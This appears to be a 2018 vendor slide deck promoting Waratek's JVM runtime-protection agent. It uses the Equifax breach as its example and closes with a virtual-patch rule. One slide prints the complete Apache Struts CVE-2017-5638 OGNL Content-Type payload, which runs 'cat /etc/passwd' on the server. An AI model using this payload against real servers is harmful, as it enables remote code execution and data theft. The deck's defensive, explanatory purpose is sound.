Waratek Runtime Protection Platform

Waratek Runtime Protection Platform Cirosec TrendTage - March 2018 Waratek Solves the Application Security Problems That No One Else Can Prateep Bandharangshi Director of Client Security Solutions

March, 2017 September, 2017 On 8 September, 2017, Equifax announced a cybercrime identity theft event potentially impacting approximately 143 million U.S. consumers. Equifax said the breach was facilitated using a flaw in Apache Struts (CVE-2017-5638). A patch for the vulnerability was released March 7, yet the company failed to apply the security updates before the attack occurred 2 months later.

January, 2018 Senators want 'massive' fines for data breaches at Equifax and other credit reporting firms January 10, 2018

February, 2018 The Equifax breach may have exposed more personal information of customers than previously thought. February 10, 2018

March, 2018 Equifax breach could be most costly in corporate history Total costs of the breach could be well over $600 million March 02, 2018

GDPR Implications IF breach was a violation of GDPR: the highest tier fine would translate to $125.8 million https://www.schellman.com/blog/gdpr-equifax-breach-the-hypothetical

CVE-2017-5638 The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

The Content-Type entity header is used to indicate the media type of the resource. In requests, (such as POST or PUT), the client tells the server what type of data is actually sent.

Content-Type:%{(#nike='multipart/formdata').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess= #dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognl Util=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#contex t.setmemberaccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contain s('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.processbuilder(#cmds)).(#p.redirecterrorstream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.servletactioncontext@getresponse().getoutputstream())).(@ org.apache.commons.io.ioutils@copy(#process.getinputstream(),#ros)).(#ros.flush())}

DEMO

Better coding will cure application attacks.

More Secure Application Coding Cannot Solve the Problem! We can t only rely on developers to write secure code

More Secure Application Coding Cannot Solve the Problem! Even if they do write, perfect, secure code, YOUR developers are only responsible for < 20% of the code that you actually run

More Secure Application Coding Cannot Solve the Problem! Large enterprises can identify far more vulnerabilities than they can actually fix

More Secure Application Coding Cannot Solve the Problem! Patching and updating everything is often completely unrealistic

Waratek Application Security Platform

Waratek Waratek is a plugin (agent) to the JVM or the.net CLR We solve three key problems: 1. Instantly patch Java and.net applications 2. Secure against OWASP Top Ten / SANS 25 3. Virtually upgrade out-of-support Java applications Out of the box protection against remote code injection exploits like apache struts

Waratek Containers A container inside the Java Virtual Machine Architecturally similar to Docker

Waratek Containers In the Docker world, you have: A host operating system A guest Docker container In the Waratek world, you have: A host Java Virtual Machine A guest Java container

What can I use Docker for? Fast, consistent delivery of your applications Responsive deployment and scaling Running more workloads on the same hardware Docker is great for operations and deployment It was not designed to solve application security problems

Waratek Java Container Inside the JVM

Waratek Containers Waratek s Runtime Container is a quarantined in-jvm container with extensive application security controls A Runtime Container virtualizes the entire App Stack (including App s JRE) from the host JVM/CLR and OS A Runtime Container s security controls are invisible, extensible, and omnipresent Business Logic 3 rd Party Components Platform & Java APIs JRE 4-8 JVM Fully protected, containerized application Waratek Java 8/ 9 JVM

As Waratek is inside the application... We see every file system operation We see every network connection We see every call to a Java API We see every execution of an operating system command We see every connection to a database We see every SQL statement We see every memory read and write operation We see every CPU instruction etc., etc., etc. Most importantly, this visibility is complete and deterministic resulting in no false positives

Application Security Policy SQLi, XSS, CSRF, Unsafe Deserialisation File system operations (read/write/exec) Network I/O Use of Java APIs Zero day protection / hardening Virtual patching

demo@demo1:~$ demo@demo1:~$ curl -s https://download.waratek.com/waratek-agent.tar.gz tar zxf - demo@demo1:~$ export JAVA_HOME="/opt/oracle/jdk-hs-8u162-linux-x64" demo@demo1:~$ export CATALINA_OPTS=" \ -agentpath:${home}/waratek/libwaratek.so \ -javaagent:${home}/waratek/waratek.jar \ -Dcom.waratek.ContainerHome=/opt/oracle/jdk-hs-7u80-linux-x64 \ -Dcom.waratek.rules.local=${HOME}/jvc.rules \ -Dcom.waratek.log.properties=${HOME}/logProps.xml \ -Dcom.waratek.rules.autoreload=true" demo@demo1:~$./tomcat_startup.sh Identical deployment model to Application Performance Monitoring (APM) agents such as AppDynamics, New Relic

demo@demo1:~$ demo@demo1:~$ curl -s https://download.waratek.com/waratek-agent.tar.gz tar zxf - demo@demo1:~$ export JAVA_HOME="/opt/oracle/jdk-hs-8u162-linux-x64" demo@demo1:~$ export CATALINA_OPTS=" \ -agentpath:${home}/waratek/libwaratek.so \ -javaagent:${home}/waratek/waratek.jar \ -Dcom.waratek.ContainerHome=/opt/oracle/jdk-hs-7u80-linux-x64 \ -Dcom.waratek.rules.local=${HOME}/jvc.rules \ -Dcom.waratek.log.properties=${HOME}/logProps.xml \ -Dcom.waratek.rules.autoreload=true" demo@demo1:~$./tomcat_startup.sh Note that the host JVM version differs to that used by the guest Java Container

DEMO

Attack Detection/Response/Zero Day Runtime Protection Rules Unbounded rules replace/insert functionality at runtime to provide patch-equivalent remediation Rules make it possible to virtually patch any vulnerability in Java CPUs, AppServers (WebLogic, JBoss, Tomcat, etc) and frameworks Virtual patching applies instantly at runtime with immediate effect, without restarting the target application

Attack Detection/Response/Zero Day --- commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/multipartstream.java +++ commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/multipartstream.java @@ -338,6 +332,12 @@ throw new IllegalArgumentException( "The buffer size specified for the MultipartStream is too small"); } this.input = input; + this.bufsize = Math.max(bufSize, boundarylength*2); this.buffer = new byte[this.bufsize]; this.notifier = pnotifier; Source code fix this.boundary = new byte[this.boundarylength]; this.keepregion = this.boundary.length; RULE Virtual Patch for CVE-2016-3092 CLASS org/apache/tomcat/util/http/fileupload/multipartstream METHOD <init>(java/io/inputstream,byte[],int,multipartstream$progressnotifier) AT WRITE bufsize IF true DO warn("applying Virtual Patch for CVE-2016-3092"); $bufsize = java/lang/math.max($bufsize, $boundarylength*2); ENDRULE Virtual Patch

Questions?